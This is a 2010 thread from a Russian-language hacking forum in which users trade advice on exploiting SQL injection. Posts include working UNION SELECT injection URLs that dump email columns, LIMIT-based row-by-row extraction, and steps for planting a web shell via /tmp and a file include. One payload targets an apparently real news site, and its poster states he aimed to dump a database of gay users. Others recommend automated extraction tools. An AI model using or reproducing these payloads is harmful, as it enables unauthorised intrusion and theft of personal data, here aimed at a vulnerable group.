 |
|
03.11.2010, 23:55
|
|
Познающий
Регистрация: 14.01.2009
Сообщений: 93
С нами:
9116636
Репутация:
39
|
|
Привет, такая ситуация, есть инъекция в селекте, есть file_priv, кавычки не экранируются, есть фулл пасс к сайту. Но проблема в том, что, как я понял, прав на запись во что-то, видное из инета, не хватает - я могу записать в /tmp, но куда-то на сайт - нет. На сайте нету форм аплоада, в админке тоже нету, видимо картинки грузятся по фтп. Соседние сайты такие же ущербные, по крайней мере, на первый взгляд. Если я правильно понимаю, единственный вариант залить шелл в подобных условиях - найти писабельную папку? Ось freebsd, но при load_file папки я вижу несколько левых символов, но не вижу листинг файлов (почему такое может быть?). Какие есть тулзы для поиска форм аплоада? Спасибо
|
|
|
04.11.2010, 00:09
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
1. залей в /tmp
2. ищи инклуд
3. подцепи шеллик
|
|
|
|
04.11.2010, 23:01
|
|
Новичок
Регистрация: 20.04.2010
Сообщений: 1
С нами:
8452680
Репутация:
0
|
|
Сообщение от Gorev
попробуй unhex(hex()) , aes_encrypt
http://www.sssssssss.om/index.php?id=-24 union select 1,2,aes_decrypt(aes_encrypt(GROUP_CONCAT(e-mail),0x71),0x71),4%20from%20user%20--
Используя такую конструкцию выводится только 10 последних записей. Каким образом можно вывести все данные?
|
|
|
|
04.11.2010, 23:06
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от ALIM
http://www.sssssssss.om/index.php?id=-24 union select 1,2,aes_decrypt(aes_encrypt(GROUP_CONCAT(e-mail),0x71),0x71),4%20from%20user%20--
Используя такую конструкцию выводится только 10 последних записей. Каким образом можно вывести все данные?
вручную через лимит по одной записи, все через утилиту...
|
|
|
|
04.11.2010, 23:07
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
http://www.sssssssss.om/index.php?id=-24 union select 1,2,aes_decrypt(aes_encrypt(CONCAT(e-mail),0x71),0x71),4+from+user+limit+0,1--
лимитом перебирай
|
|
|
|
04.11.2010, 23:31
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от ALIM
http://www.baywindows.com/index.php?ch=news&sc=glbt&sc3=&id=106949%20and%201 =2%20union%20select%20aes_decrypt(aes_encrypt(GROU P_CONCAT(email),0x71),0x71),2,3,4,5,6,7,8,9,10%20f rom%20users --
хотел слить базу гомиков, если кто-нибудь обьяснит в личку каким образом можно было слить всю базу, а не по одному скажу спасибо
что тут обьяснять? я же тебе выше написал, используй тулзу какую нибудь, например сипт или панголин...делов то...
|
|
|
|
04.11.2010, 23:36
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами:
8789993
Репутация:
5
|
|
Вопрос: Могу исполнять html, как залить шшел?
|
|
|
|
05.11.2010, 00:01
|
|
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
С нами:
10139306
Репутация:
1089
|
|
Сообщение от EoGeneo
Вопрос: Могу исполнять html, как залить шшел?
мы рады за Вас, одно фигово :то что ты написал- не взаимосвязанно
|
|
|
|
05.11.2010, 00:05
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами:
8789993
Репутация:
5
|
|
Сообщение от Kusto
мы рады за Вас, одно фигово :то что ты написал- не взаимосвязанно
Я знаю, уже все что можно перепробовал, отчаялся и написал....мало ли
|
|
|
|
05.11.2010, 00:09
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от EoGeneo
Я знаю, уже все что можно перепробовал, отчаялся и написал....мало ли
А то, что HTML - это язык гипертекстовой разметки, тебе не пришло в голову?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
